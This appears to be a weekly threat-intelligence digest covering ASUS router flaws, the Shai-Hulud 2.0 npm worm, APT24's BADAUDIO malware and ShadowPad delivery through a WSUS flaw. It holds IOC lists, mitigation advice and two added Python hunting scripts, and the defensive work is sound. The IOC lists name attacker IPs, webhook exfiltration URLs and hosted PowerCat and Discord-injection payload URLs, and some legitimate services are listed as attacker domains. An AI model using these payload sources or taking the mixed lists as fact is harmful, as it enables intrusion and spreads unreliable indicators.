https://www.bleepingcomputer.com/news/security/asus-warns-of-new-critical-auth-bypass-flaw-in-aicloud-routers/
https://www.hkcert.org/security-bulletin/asus-router-multiple-vulnerabilities_20251126

Threat Details and IOCs
Malware: PoisonPlug, RingReaper, ShadowPad
CVEs: CVE-2023-41345, CVE-2023-41348, CVE-2024-12912, CVE-2025-12003, CVE-2025-2492, CVE-2025-59365, CVE-2025-59366, CVE-2025-59368, CVE-2025-59369, CVE-2025-59370, CVE-2025-59371, CVE-2025-59372, CVE-2025-59373
Technologies: ASUS, ASUS ASUSWRT, ASUS Router, ASUSWRT, Linux, Microsoft Windows, Samba
Threat Actors: AyySSHush
Attacker Countries: China
Victim Industries: Consumer Electronics, Hospitality, Retail, Technology Hardware
Victim Countries: Austria, Brunei, Cambodia, Croatia, Czech Republic, Germany, Hungary, Indonesia, Laos, Liechtenstein, Malaysia, Myanmar, Philippines, Poland, Russia, Singapore, Slovakia, Slovenia, Switzerland, Taiwan, Thailand, Timor-Leste, United States, Vietnam

Mitigation Advice
Identify all ASUS routers on the network and update their firmware to the latest version to patch CVE-2025-59366 and other listed vulnerabilities.
For any ASUS routers that cannot be immediately patched or do not require the AiCloud feature, disable AiCloud to remove the primary attack vector for CVE-2025-59366.
On unpatchable or end-of-life ASUS routers, disable all remote administration access from the WAN.
On unpatchable or end-of-life ASUS routers, disable the built-in VPN server functionality to reduce the external attack surface.
Review and disable all non-essential port forwarding, DMZ, and port triggering rules on ASUS routers that cannot be updated.
On unpatchable or end-of-life ASUS routers, disable the built-in FTP server to prevent potential exploitation.

Compliance Best Practices
Establish and enforce a hardware lifecycle management policy to ensure network devices like routers are replaced before they reach end-of-life and no longer receive security patches.
Implement a network security policy that requires all non-essential services on internet-facing devices to be disabled by default.
Enforce a strong password policy for all network device administrative accounts, requiring unique, complex passwords and periodic audits for compliance.
Develop a formal vulnerability management program that includes regular, automated scanning of all network perimeter devices to identify outdated firmware, open ports, and insecure configurations.

Stay updated on emerging threats: sign up for the F5 Threat Report to receive the Weekly Threat Report in your inbox.

F5 Threat Report - November 26th, 2025
Shai-Hulud 2.0 npm Supply Chain Attack Steals Credentials

A new npm supply-chain campaign, dubbed Shai-Hulud 2.0, has compromised numerous popular packages, including those from Zapier, ENS Domains, PostHog, and Postman, by leveraging compromised maintainer accounts to publish trojanized versions. This variant executes malicious code during the `preinstall` phase, leading to credential theft and exfiltration of developer and CI/CD secrets to GitHub repositories named "Shai-Hulud." The attack, observed between November 21 and 23, 2025, creates files like `cloud.json`, `contents.json`, `environment.json`, and `truffleSecrets.json`, and attempts to create `discussion.yaml`. Key indicators of compromise include specific package versions (e.g., `@zapier/zapier-sdk` 0.15.5-0.15.7, `@ensdomains/ens-validation` 0.1.1, `@posthog/agent` 1.24.1), the presence of `pre-install` scripts, a GitHub Actions workflow named `shai-hulud-workflow.yml`, access to cloud metadata endpoints, outbound connections to `webhook[.]site`, and `data.json` files containing encoded secrets. Immediate actions recommended include removing and replacing compromised packages, clearing the npm cache, pinning dependencies to known clean versions or rolling back to pre-November 21, 2025 builds, revoking and regenerating npm tokens, GitHub PATs, SSH keys, and cloud provider credentials, enforcing phishing-resistant MFA, searching for "Shai-Hulud" repositories, reviewing for unauthorized workflows, monitoring new npm publishes, restricting or disabling lifecycle scripts in CI/CD, limiting outbound network access, and using short-lived, scoped automation tokens.

Severity: Critical

Sources
https://cyberinsider.com/second-wave-of-shai-hulud-npm-malware-hits-zapier-ens-domains/
https://financefeeds.com/shai-hulud-malware-hits-400-javascript-packages-in-major-npm-supply-chain-attack/
https://gbhackers.com/zapiers-npm-account-hacked-multiple-packages-infected/
https://hackread.com/shai-hulud-npm-worm-supply-chain-attack/
https://securitylabs.datadoghq.com/articles/supply-chain-attacks-runtime-security-detection/
https://thehackernews.com/2025/11/second-sha1-hulud-wave-affects-25000.html
https://www.bitcoininsider.org/article/293565/shai-hulud-malware-hits-npm-crypto-libraries-face-growing-security-crisis
https://www.bleepingcomputer.com/news/security/shai-hulud-malware-infects-500-npm-packages-leaks-secrets-on-github/
https://www.hendryadrian.com/shai-hulud-npm-attack-what-you-need-to-know/
https://www.theregister.com/2025/11/24/shai_hulud_npm_worm/
https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack

Threat Details and IOCs
Malware: Anivia Stealer, Sha1-Hulud, SHA1-HULUD, Shai Hulud, Shai-Hulud, ZeroTrace Stealer
CVEs: CVE-2025-10894, CVE-2025-59037, CVE-2025-59140, CVE-2025-59141, CVE-2025-59142, CVE-2025-59143, CVE-2025-59144, CVE-2025-59162, CVE-2025-59330, CVE-2025-59331
Technologies: Amazon Web Services, Amazon Web Services (AWS), Apple macOS, AsyncAPI, Bun, Ethereum, Ethereum Name Service, GitHub, GitHub Actions, Google Cloud Platform, Google Cloud Platform (GCP), Kubernetes, Linux, Microsoft Azure, Microsoft Windows, Node.js, npm, PostHog, Postman, SSH, Vercel Next.js, Zapier
Attacker Domains: bun.sh, shai-hulud-2.github.io, webhook.site
Attacker URLs: bun.sh/install.ps1, https://bun.sh/install, https://github.com/asyncapi/cli/blob/2efa4dff59bc3d3cecdf897ccf178f99b115d63d/bun_environment.js, https://github.com/search?q=Sha1-Hulud%3A+The+Second+Coming.&ref=opensearch&type=repositories, hxxps://shai-hulud-2.github.io/data.json, hxxps://webhook.site/a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6, hxxps://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
Attacker Hashes: 2efa4dff59bc3d3cecdf897ccf178f99b115d63d
Victim Industries: Critical Manufacturing, Cryptocurrency, Financial Services, Healthcare, Information Technology, Manufacturing, Software, Technology Hardware
Victim Countries: Belgium, Cayman Islands, United States

Mitigation Advice
Scan all development and CI/CD environments for the specific compromised npm packages and versions listed in the article.
If any compromised npm packages are found, remove them, clear the npm cache, and delete the `node_modules` directory from the affected project.
Block all outbound network connections from build servers and developer workstations to `webhook[.]site` at the network firewall.
Search all company-managed GitHub organizations for newly created repositories containing "Shai-Hulud" in the title or description.
Scan all GitHub repositories for the presence of a workflow file named `shai-hulud-workflow.yml`.
Immediately revoke and regenerate all npm tokens, GitHub Personal Access Tokens (PATs), and SSH keys used in development and CI/CD environments.
Immediately revoke and regenerate all cloud provider credentials, such as AWS IAM roles or GCP service account keys, accessible from CI/CD environments.

Compliance Best Practices
Implement and enforce a strict policy for all development projects to pin npm package dependencies to specific, audited versions using a lock file.
Update CI/CD pipeline configurations to disable or restrict the execution of npm lifecycle scripts, such as `preinstall` and `postinstall`, by default.
Enforce the use of phishing-resistant Multi-Factor Authentication (MFA) for all developer and administrator accounts on code repositories like GitHub and package registries like npm.
Implement network egress filtering on all CI/CD build runners to only allow outbound connections to a pre-approved list of essential domains.
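The mitigation and pinning items above call for three concrete checks: the compromised package versions in a project's lockfile, lifecycle hooks declared by installed dependencies, and the `shai-hulud-workflow.yml` file under `.github/workflows`. The Python script below is an added example (not F5's tooling or code from the report) that runs those checks against an npm lockfile (lockfileVersion 2 or 3) and a dependency manifest. The compromised-version table holds only the versions the report names, the lockfile and manifest contents are constructed, and `install-hook.js` is a made-up script name.

```python
"""Hunt a Node.js project for the Shai-Hulud 2.0 indicators named in the report.

Checks an npm lockfile (lockfileVersion 2/3) for the compromised package versions
the report lists, flags install-time lifecycle hooks declared by a dependency, and
looks for the report's workflow filename under .github/workflows.
"""
import json
import os

# Versions named in the report. Assumption: this is the report's illustrative
# subset, not the full compromised list; extend it from your threat feed.
COMPROMISED_RANGES = {
    "@zapier/zapier-sdk": [("0.15.5", "0.15.7")],
    "@ensdomains/ens-validation": [("0.1.1", "0.1.1")],
    "@posthog/agent": [("1.24.1", "1.24.1")],
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
WORKFLOW_IOC = "shai-hulud-workflow.yml"


def load_json(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def parse_version(version):
    """'1.24.1' -> (1, 24, 1); pre-release and build suffixes are ignored."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    return tuple(int(part) for part in core.split("."))


def in_range(version, low, high):
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def package_name(lock_key):
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (nested deps count too)."""
    return lock_key.rsplit("node_modules/", 1)[-1]


def find_compromised(lock):
    """Return (name, version, lock_path) for every lockfile entry in a bad range."""
    hits = []
    for key, meta in lock.get("packages", {}).items():
        if not key:
            continue  # "" is the root project entry, not a dependency
        name, version = package_name(key), meta.get("version", "")
        for low, high in COMPROMISED_RANGES.get(name, []):
            if version and in_range(version, low, high):
                hits.append((name, version, key))
    return hits


def find_lifecycle_scripts(name, manifest):
    """Return (name, hook, command) for each install-time hook a package declares."""
    scripts = manifest.get("scripts", {})
    return [(name, hook, scripts[hook]) for hook in LIFECYCLE_HOOKS if hook in scripts]


def find_workflow_ioc(repo_root):
    """Return any .github/workflows file whose name matches the report's IOC."""
    wf_dir = os.path.join(repo_root, ".github", "workflows")
    if not os.path.isdir(wf_dir):
        return []
    return [os.path.join(wf_dir, f) for f in os.listdir(wf_dir) if f == WORKFLOW_IOC]


# Constructed sample data (not from the page): a lockfile with one direct and one
# nested hit, and a dependency manifest that declares a preinstall hook.
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/@zapier/zapier-sdk": {"version": "0.15.6"},
        "node_modules/@posthog/agent": {"version": "1.23.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/left-pad/node_modules/@ensdomains/ens-validation": {"version": "0.1.1"},
    },
}
SAMPLE_MANIFEST = {
    "name": "@zapier/zapier-sdk",
    "version": "0.15.6",
    "scripts": {"preinstall": "node install-hook.js", "test": "jest"},
}

if __name__ == "__main__":
    for name, version, path in find_compromised(SAMPLE_LOCK):
        print(f"COMPROMISED {name}@{version} at {path}")
    for name, hook, cmd in find_lifecycle_scripts("@zapier/zapier-sdk", SAMPLE_MANIFEST):
        print(f"LIFECYCLE   {name} runs '{cmd}' on {hook}")
    for path in find_workflow_ioc("."):
        print(f"WORKFLOW    {path}")
```

Against a real project, call `find_compromised(load_json("package-lock.json"))` and feed each `node_modules/*/package.json` to `find_lifecycle_scripts`; a match is a lead to confirm against the full published list and the package's expected hooks, not proof of compromise on its own.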
Re-architect CI/CD pipelines to use dynamically generated, short-lived, and narrowly-scoped access tokens for authentication instead of static, long-lived credentials.
Implement automated monitoring to generate security alerts for any new packages published to public registries under your organization's name or scopes.

APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains

A China-nexus threat actor, APT24 (also known as Pitty Tiger), has been observed deploying a previously undocumented malware named BADAUDIO in a nearly three-year espionage campaign primarily targeting Taiwan, alongside government, healthcare, construction, mining, non-profit, and telecommunications sectors in the U.S. BADAUDIO, a highly obfuscated C++ first-stage downloader, uses control flow flattening to resist reverse engineering and relies on DLL Search Order Hijacking for execution. It gathers system information, exfiltrates it, and downloads AES-encrypted payloads, such as Cobalt Strike Beacon. Initial access vectors include watering holes: over 20 legitimate websites were compromised from November 2022 to September 2025 to inject JavaScript that targeted Windows users with fake Google Chrome update pop-ups using FingerprintJS. A significant supply chain compromise occurred in July 2024 when APT24 breached a Taiwanese digital marketing firm, injecting malicious JavaScript into a widely used library and affecting over 1,000 domains. Targeted phishing campaigns, active since August 2024, use animal rescue lures and tracking pixels to deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. Separately, another China-nexus threat actor, codenamed Autumn Dragon, has conducted a sustained espionage campaign against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. This campaign exploits a WinRAR vulnerability (CVE-2025-8088, CVSS 8.8) via spear-phishing with malicious RAR archives, leading to DLL sideloading using legitimate executables like `obs-browser-page.exe` and `Creative Cloud Helper.exe` to establish persistence, communicate via Telegram for reconnaissance, and deploy a C++ implant capable of executing various commands.

Severity: Critical

Sources
https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/
https://securityonline.info/chinas-apt24-launches-stealth-badaudio-malware-hitting-1000-domains-via-taiwanese-supply-chain-hack/
https://thehackernews.com/2025/11/apt24-deploys-badaudio-in-years-long.html
https://www.hendryadrian.com/apt24s-pivot-to-multi-vector-attacks-google-cloud-blog/
https://www.hendryadrian.com/beyond-the-watering-hole-apt24s-pivot-to-multi-vector-attacks/
https://www.securitylab.ru/news/566430.php
https://www.securityweek.com/chinese-cyberspies-deploy-badaudio-malware-via-supply-chain-attacks/

Threat Details and IOCs
Malware: Agentemis, BadAudio, BADAUDIO, Beacon, BEACON, Cobalt Strike, CobaltStrike, Cobalt Strike Beacon, cobeacon, Enfal, Gh0st, Gh0st RAT, Lurid Downloader, Roudan, Specas, Taidoor
CVEs: CVE-2012-0158, CVE-2014-1761, CVE-2025-8088
Technologies: Adobe Creative Cloud, Google Chrome, Google Drive, Microsoft OneDrive, Microsoft Windows, RARLAB WinRAR
Threat Actors: APT24, AutumnDragon, EarthAughisky, G0011, PITTY PANDA, PittyTiger, Taidoor, Temp.Pittytiger, TempPittytiger
Attacker Countries: China
Attacker Domains: clients.brendns.workers.dev, jarzoda.net, jsdelivrs.com, public.megadatacloud.com, roller.johallow.workers.dev, taiwantradoshows.com, tradostw.com, trcloudflare.com, wispy.geneva.workers.dev, www.availableextens.com, www.brighyt.com, www.cundis.com, www.decathlonm.com, www.gerikinage.com, www.growhth.com, www.p9-car.com, www.twisinbeth.com
Attacker URLs: https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js, https://wispy.geneva.workers.dev/pub/static/img/merged?version=65feddea0367, https://www.twisinbeth.com/query.php, https://www.twisinbeth.com/query.php?id=
Attacker Hashes: 032c333eab80d58d60228691971d79b2c4cd6b9013bae53374dd986faa0f3f4c, 07226a716d4c8e012d6fabeffe2545b3abfc0b1b9d2fccfa500d3910e27ca65b, 0e98baf6d3b67ca9c994eb5eb9bbd40584be68b0db9ca76f417fb3bcec9cf958, 176407b1e885496e62e1e761bbbb1686e8c805410e7aec4ee03c95a0c4e9876f, 1f31ddd2f598bd193b125a345a709eedc3b5661b0645fc08fa19e93d83ea5459, 2ea075c6cd3c065e541976cdc2ec381a88b748966f960965fdbe72a5ec970d4e, 55e02a81986aa313b663c3049d30ea0158641a451cb8190233c09bef335ef5c7, 5c37130523c57a7d8583c1563f56a2e2f21eef5976380fdb3544be62c6ad2de5, 83fb652af10df4574fa536700fa00ed567637b66f189d0bbdb911bd2634b4f0e, 88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213, 9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182, ae8473a027b0bcc65d1db225848904e54935736ab943edf3590b847cb571f980, c4e910b443b183e6d5d4e865dd8f978fd635cd21c765d988e92a5fd60a4428f5, c7565ed061e5e8b2f8aca67d93b994a74465e6b9b01936ecbf64c09ac6ee38b9, cfade5d162a3d94e4cba1e7696636499756649b571f3285dd79dea1f5311adcd, d23ca261291e4bad67859b5d4ee295a3e1ac995b398ccd4c06d2f96340b4b5f8, f086c65954f911e70261c729be2cdfa2a86e39c939edee23983090198f06503c, f1e9d57e0433e074c47ee09c5697f93fde7ff50df27317c657f399feac63373a
Victim Industries: Advertising Services, Arts, Entertainment, and Recreation, Construction, Engineering, Government, Healthcare, Industrials, Marketing & Advertising, Mining, Multimedia, Non-Governmental Organizations (NGOs), Retail, Telecommunications
Victim Countries: Cambodia, Indonesia, Laos, Philippines, Singapore, Taiwan, United States

Mitigation Advice
Immediately patch all instances of WinRAR to version 7.13 or later to mitigate the actively exploited vulnerability CVE-2025-8088.
Block the domain 'public.megadatacloud[.]com' at the network perimeter using your firewall, web proxy, or DNS filtering solution.
Use your endpoint detection and response (EDR) tool to hunt for the legitimate executables 'obs-browser-page.exe' or 'Creative Cloud Helper.exe' loading malicious DLLs named 'libcef.dll' or 'CRClient.dll'.
Configure endpoint detection rules to alert on legitimate applications loading DLLs from non-standard paths or user-writable directories to detect potential DLL Search Order Hijacking.
Configure security controls to block or perform enhanced content inspection on encrypted archives downloaded from Google Drive.
Configure security controls to block or perform enhanced content inspection on encrypted archives downloaded from Microsoft OneDrive.

Compliance Best Practices
Develop and implement a continuous security awareness training program that educates users on identifying and reporting phishing attempts, especially those with suspicious attachments or links to cloud services.
Establish a vendor risk management program to vet and continuously monitor the security posture of third-party suppliers, particularly those who provide code or services integrated into your company's websites.
Deploy an application control solution, such as AppLocker or a third-party tool, to restrict software execution to only authorized applications, scripts, and DLLs.
Implement a network egress filtering policy that denies all outbound traffic by default and only allows connections to known-good domains and ports required for business operations.
Harden PowerShell across the environment by enabling Constrained Language Mode and forwarding all PowerShell script block and module logs to a centralized SIEM for analysis.
Implement Subresource Integrity (SRI) on all corporate websites to ensure that third-party JavaScript libraries and other resources are not modified without authorization.
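To make the two EDR hunting items above concrete, here is an added Python example (not part of the report or any vendor's detection content) that applies them to Sysmon-style image-load events (Event ID 7): the report's executable/DLL pairings loading from outside a trusted install root, and any process loading a DLL from a user-writable directory. The pipe-delimited log format, the path roots, the user names and the sample events are constructed for this example.

```python
"""Hunt image-load telemetry for the DLL search-order hijacking pattern in the report.

Two rules over Sysmon-style "Image Loaded" events:
  1. the report's known sideload pairs (obs-browser-page.exe/libcef.dll,
     Creative Cloud Helper.exe/CRClient.dll) loading from outside a trusted root;
  2. any application loading a DLL from a user-writable directory.
"""
import ntpath

# Host executable -> DLLs it is known to sideload, per the report's mitigation advice.
KNOWN_SIDELOAD_PAIRS = {
    "obs-browser-page.exe": {"libcef.dll"},
    "creative cloud helper.exe": {"crclient.dll"},
}
# Assumption: a default Windows layout; extend TRUSTED_ROOTS with your own install roots.
TRUSTED_ROOTS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
)
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_event(line):
    """'Image=... | ImageLoaded=... | Signed=true' -> dict (constructed log format)."""
    return dict(field.split("=", 1) for field in line.split(" | "))


def under(path, roots):
    return path.lower().startswith(roots)


def classify(event):
    """Return the rule names an image-load event triggers (empty list = benign)."""
    image, dll = event["Image"].lower(), event["ImageLoaded"].lower()
    exe_name, dll_name = ntpath.basename(image), ntpath.basename(dll)
    rules = []
    if dll_name in KNOWN_SIDELOAD_PAIRS.get(exe_name, set()) and not under(dll, TRUSTED_ROOTS):
        rules.append("known-sideload-pair-outside-trusted-root")
    if under(dll, USER_WRITABLE_ROOTS):
        rules.append("dll-loaded-from-user-writable-path")
    return rules


def hunt(lines):
    """Run both rules over raw log lines; unsigned loads are surfaced for triage priority."""
    findings = []
    for line in lines:
        event = parse_event(line)
        rules = classify(event)
        if rules:
            findings.append({
                "image": event["Image"],
                "dll": event["ImageLoaded"],
                "signed": event.get("Signed", "").lower() == "true",
                "rules": rules,
            })
    return findings


# Constructed sample telemetry (not from the page); paths and users are made up.
SAMPLE_EVENTS = [
    "Image=C:\\Program Files\\obs-studio\\bin\\64bit\\obs-browser-page.exe | ImageLoaded=C:\\Program Files\\obs-studio\\bin\\64bit\\libcef.dll | Signed=true",
    "Image=C:\\Users\\alice\\AppData\\Local\\Temp\\rescue\\obs-browser-page.exe | ImageLoaded=C:\\Users\\alice\\AppData\\Local\\Temp\\rescue\\libcef.dll | Signed=false",
    "Image=C:\\Users\\bob\\Downloads\\Creative Cloud Helper.exe | ImageLoaded=C:\\Users\\bob\\Downloads\\CRClient.dll | Signed=false",
    "Image=C:\\Windows\\System32\\svchost.exe | ImageLoaded=C:\\Windows\\System32\\ntdll.dll | Signed=true",
    "Image=C:\\Program Files\\Vendor\\tool.exe | ImageLoaded=C:\\ProgramData\\cache\\helper.dll | Signed=false",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        flag = "unsigned" if not f["signed"] else "signed"
        print(f"[{', '.join(f['rules'])}] ({flag}) {f['image']} loaded {f['dll']}")
```

Expect the second rule to fire on legitimately per-user-installed software that lives under AppData; pair it with an allowlist of known-good image/DLL combinations and rank unsigned loads first, since a copied legitimate executable sitting next to an unsigned DLL in a temporary directory is the pattern the report describes.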
Chinese Hackers Exploiting WSUS Remote Code Execution Vulnerability to Deploy ShadowPad Malware

Chinese hackers are actively exploiting CVE-2025-59287, a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), to deploy the ShadowPad backdoor. Microsoft issued a security advisory for this vulnerability on October 14, 2025, and public proof-of-concept exploits emerged on October 22, 2025. The attack begins by exploiting the WSUS vulnerability to execute PowerCat, which establishes a reverse shell to 154.17.26.41 on port 8080. Subsequently, on November 6, 2025, attackers used legitimate Windows utilities such as curl.exe and certutil.exe to install ShadowPad. This modular backdoor, associated with Chinese state-sponsored APT groups, employs DLL side-loading involving components like ETDCtrlHelper.exe, ETDApix.dll, and 0C137A80.tmp, and establishes persistence through Windows Registry modifications, scheduled tasks, and service creation under the identifier "Q-X64." It communicates with command-and-control servers at 163.61.102.245 via HTTP/HTTPS on port 443, using Firefox user-agent strings and injecting into processes such as Windows Mail, Windows Media Player, and svchost.exe. Organizations must immediately apply the security update for CVE-2025-59287, audit WSUS server exposure to block inbound traffic on TCP ports 8530 and 8531 from non-Microsoft Update sources, and conduct threat hunting for suspicious PowerShell execution (specifically involving certutil.exe and curl.exe) and network connections to the identified C2 infrastructure.

Severity: Critical

Sources
https://bluefire-redteam.com/cve-2025-59287-deep-dive-response-playbook-and-siem-edr-detection-recipes/
https://buaq.net/go-371618.html
https://buaq.net/go-373861.html
https://buaq.net/go-375698.html
https://cyberpress.org/cisa-alerts-on-active-exploitation-of-windows-server-update-services-rce-flaw/
https://cyberpress.org/cisa-warns-wsus-vulnerability/
https://cyberpress.org/hackers-exploit-wsus-vulnerability-to-steal-sensitive-organizational-data/
https://cyberpress.org/microsofts-wsus-patch/
https://cyberpress.org/shadowpad-malware/
https://cyberpress.org/tcp-ports-8530-8531-wsus/
https://cyberscoop.com/microsoft-windows-server-update-services-vulnerability-exploited-attacks/
https://gbhackers.com/attackers-exploit-windows-server-update-services-flaw/
https://gbhackers.com/cisa-alerts-on-of-wsus-vulnerability/
https://gbhackers.com/hackers-actively-scanning-tcp-ports-8530-8531/
https://gbhackers.com/microsofts-wsus-patch-causes-hotpatching-failures/
https://gbhackers.com/wsus-vulnerability/
https://hackread.com/hackers-exploit-wsus-skuld-stealer-microsoft-patch/
https://horizon3.ai/attack-research/vulnerabilities/cve-2025-59287/
https://hothardware.com/news/windows-server-update-service-is-under-attack
https://isc.sans.edu/diary/rss/32440
https://latesthackingnews.com/2025/10/28/microsoft-october-patch-tuesday-is-huge-with-170-fixes/
https://meterpreter.org/windows-server-wsus-flaw-under-active-attack-cve-2025-59287-cvss-9-8-with-public-poc/
https://orca.security/resources/blog/cve-2025-59287-critical-wsus-rce/
https://securityboulevard.com/2025/10/critical-microsoft-wsus-security-flaw-is-being-actively-exploited/
https://securityboulevard.com/2025/10/windows-server-update-service-wsus-remote-code-execution-vulnerability-cve-2025-59287/
https://securityonline.info/critical-wsus-rce-cve-2025-59287-actively-exploited-to-deploy-shadowpad-backdoor/
https://socprime.com/blog/cve-2025-59287-detection/
https://thehackernews.com/2025/10/cisa-and-nsa-issue-urgent-guidance-to.html
https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287
https://www.bleepingcomputer.com/news/microsoft/microsoft-patch-for-wsus-flaw-disabled-windows-server-hotpatching/
https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-windows-server-wsus-flaw-exploited-in-attacks/
https://www.esecurityplanet.com/news/wsus-vulnerability/
https://www.helpnetsecurity.com/2025/10/30/wsus-vulnerability-infostealer-cve-2025-59287/
https://www.hendryadrian.com/analysis-of-shadowpad-attack-exploiting-wsus-remote-code-execution-vulnerability-cve-2025-59287/
https://www.hendryadrian.com/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability-cve-2025-59287/
https://www.hendryadrian.com/microsoft-wsus-remote-code-execution-cve-2025-59287-actively-exploited-in-the-wild/
https://www.infosecurity-magazine.com/news/actively-exploited-wsus-bug-cisa/
https://www.scworld.com/brief/attacks-involving-critical-wsus-vulnerability-under-investigation
https://www.scworld.com/brief/dozens-impacted-by-active-wsus-vulnerability-abuse
https://www.theregister.com/2025/10/27/microsoft_wsus_attacks_multiple_orgs/

Threat Details and IOCs
Malware: Alureon, BadCandy, BADCANDY, CryptoDefense, CryptoLocker, GlassWorm, Gokcpdoor, Locky, Lukitus, Msevents, MS Juan, PoisonPlug, POISONPLUG.SHADOW, SesameOp, ShadowPad, Skuld, Skuld Stealer, Stealit, TDL3, TDL-4, TDSS, Tidserv, TMPN Stealer, Virtumonde, Vundo, WinFixer
CVEs: CVE-2024-11972, CVE-2024-9234, CVE-2024-9707, CVE-2025-0033, CVE-2025-24052, CVE-2025-24990, CVE-2025-2884, CVE-2025-47827, CVE-2025-49708, CVE-2025-55315, CVE-2025-59218, CVE-2025-59230, CVE-2025-59246, CVE-2025-59287
Technologies: Microsoft Entra ID, Microsoft Exchange Server, Microsoft Internet Information Services, Microsoft .NET Framework, Microsoft Windows, Microsoft Windows Server, Microsoft Windows Server Update Services, QNAP NetBak PC Agent, WordPress
Threat Actors: APT17, APT23, APT41, AquaticPanda, DaggerPanda, EarthLusca, Skuld, TontoTeam, UNC6512, WetPanda, WickedPanda
Attacker Countries: China
Attacker IPs: 129.153.98.207, 134.122.38.84, 149.28.78.189, 154.17.26.41, 158.247.199.185, 163.61.102.245, 207.180.254.242, 45.158.12.7
Attacker Domains: api.braintreegateway.com, api.stripe.com, asec.ahnlab.com, avatars.githubusercontent.com, billing.epac.to, cybaq.chtq.net, dscriy.chtq.net, i.ibb.co, loglog.ac.d189493a.digimg.store, raw.githubusercontent.com, remote-auth-gateway.discord.gg, royal-boat-bf05.qgtxtebl.workers.dev, webhook.site, workersdev, wsus.ac.d189493a.digimg.store, yogswgeacbepthpjozvsf8frv90962ejy.oast.fun, ysoserial.net
Attacker URLs: HTTP://163.61.102.245:443, HTTPS://163.61.102.245:443, https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts, https://api.stripe.com/v*/tokens, https://asec.ahnlab.com/wp-admin/admin-ajax.php, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.16.1, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?m=1709594534, https://asec.ahnlab.com/wp-content/plugins/elementor-pro/modules/lottie/assets/animations/default.json, https://asec.ahnlab.com/wp-json/, https://avatars.githubusercontent.com/u/145487845?v=4, https://discordapp.com/api/v*/auth/sessions, https://*.discord.com/api/v*/auth/sessions, https://discord.com/api/v*/auth/sessions, https://i.ibb.co/GJGXzGX/discord-avatar-512-FCWUJ.png, https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1, https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js, http://webhook.site/REDACTED, hxxp://134.122.38.84/dl, hxxp://134.122.38.84/ex, hxxp://149.28.78.189:42306, hxxp://149.28.78.189:42306/dll.txt, hxxp://149.28.78.189:42306/exe.txt, hxxp://149.28.78.189:42306/tmp.txt, hxxps://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi, hxxps://webhook.site/0f20cd3b-e570-4205-8049-c37627af0f5c, hxxps://webhook.site/7b483bdd-5134-4671-b9cd-310800303f32, hxxp://webhook.site/22b6b8c8-2e07-4878-a681-b772e569aa6a, hxxp://webhook.site/5771a289-0b13-4ee7-902a-21147cac31ef, hxxp://webhook.site/94f6da9d-b785-461b-bc5e-bbce7acaa35c, hxxp://yogswgeacbepthpjozvsf8frv90962ejy.oast.fun/check, wss://remote-auth-gateway.discord.gg/*
Attacker Hashes: 27e00b5594530e8c5e004098eef2ec50, 3ebeb4e08c82b220365b1e7dd0cc199b765eed91, 564e7d39a9b6da3cf0da3373351ac717, 85b935e80e84dd47e0fa5e1dfb2c16f4, 9d686ceed21877821ab6170a348cc073, a0f65fcd3b22eb8b49b2a60e1a7dd31c, f7d8c52bec79e42795cf15888b85cbad
Victim Industries: Aerospace, Construction, Critical Manufacturing, Education, Energy, Financial Services, Government, Healthcare, Health Care Technology, Information, Information and Communication, Information Technology, Logistics, Manufacturing, Multimedia, Public Health, Public Safety, Retail, Software, Technology Hardware, Telecommunications, Transportation, Utilities
Victim Countries: Afghanistan, Germany, Malaysia, Netherlands, Pakistan, Taiwan, United States

Mitigation Advice
Immediately apply the security update for CVE-2025-59287 to all Windows Servers running the WSUS service.
Create rules on the perimeter firewall to block all inbound and outbound traffic to IP addresses 154.17.26.41 and 163.61.102.245.
Configure host-based and network firewalls to restrict inbound access to WSUS servers on TCP ports 8530 and 8531, allowing connections only from required Microsoft Update IP ranges.
Use your EDR solution or other endpoint scanning tools to conduct a targeted search across all servers for the files `ETDApix.dll` and `0C137A80.tmp`.
In your SIEM or EDR, search for executions of `curl.exe` or `certutil.exe` on WSUS servers that are followed by the creation of new executable files or services.
